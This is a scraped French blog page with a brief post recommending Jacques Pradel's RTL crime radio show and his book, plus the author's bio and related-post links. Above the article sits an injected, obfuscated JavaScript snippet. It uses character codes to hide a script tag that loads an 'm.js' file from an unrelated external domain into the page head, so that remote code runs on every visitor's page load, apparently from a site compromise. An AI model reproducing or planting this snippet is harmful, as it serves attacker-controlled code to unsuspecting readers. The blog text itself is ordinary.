Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,119,101,108,108,46,108,105,110,101,116,111,97,100,115,97,99,116,105,118,101,46,99,111,109,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();

    L’heure du crime

    La très bonne émission quotidienne de Jacques Pradel permet de revivre de grandes affaires oubliées ou de se pencher à chaud sur l’actualité du fait-divers et de la justice. D’expérience, je peux attester qu’en cette ère du bricolage et de l’audience facile, cette émission fait l’objet d’une préparation rigoureuse en amont.
    Pour aller plus loin, je conseille la lecture de “Les grandes affaires criminelles pour les Nuls” (éditons First) du même Jacques Pradel. Un vademecum qui se lit comme un roman !
    http://www.rtl.fr/emission/l-heure-du-crime

    Commentez ou exprimez-vous grâce aux emojis !
    0
    J'AIMEJ'AIME
    0
    J'ADOREJ'ADORE
    0
    HahaHaha
    0
    WOUAHWOUAH
    0
    SUPER !SUPER !
    0
    TRISTETRISTE
    0
    GrrrrGrrrr
    Merci !
    • Depuis cinq ans, chaque dimanche dans le Courrier picard, les Histoires de prétoire présentent non pas les plus importantes affaires du rôle d’audience mais les plus émouvantes, énervantes, cocasses, amusantes. La fidélité des lecteurs et les encouragements de certains confrères m’ont donné envie de les réunir dans ce blog, avec (car la maison ne recule devant aucun sacrifice) quelques autres articles que j’ai commis. Ces pages sont-elles réservées aux spécialistes du droit ou à quelques voyeurs qui se complairaient du malheur des autres ? Je ne le crois pas, tant ces tranches de vie me semblent au contraire universelles. Alors bonne lecture ! Et demandez-vous avec Victor Hugo : « Qui sait si l’homme n’est pas un repris de justice divine ? » Tony Poulain

    • Show Comments

    Your email address will not be published. Required fields are marked *

    comment *

    • name *

    • email *

    • website *

    You May Also Like

    Le Petit Nicolas en picard et dans le “Courrier picard”

    Confirmation: le Petit Nicolas traduit en picard, c’est pour bientôt. Le Petit Nicolas, le ...

    Des dictateurs du XXe siècle 2.0 mais pas très nets

    ennemisdavant.com, toutes les grandes figures du XXe siècle enfin sur le Net, Emmanuel Reuzé ...

    Quelques pas vers la lumière… des cristaux

    Quelques pas vers la lumière, tome 5: le livre de la vie, Bruno Marchand, ...

    Les dessins censurés ont franchi l’Atlantique !

    L’onde de choc de la censure de l’expo des dessins érotiques à la bibliothèque ...

    De Byrne à Mondrian (et retour): l’art et la matière

    Le courant d’art: de Byrne à Mondrian / de Mondrian à Byrne, Frédéric Bézian. ...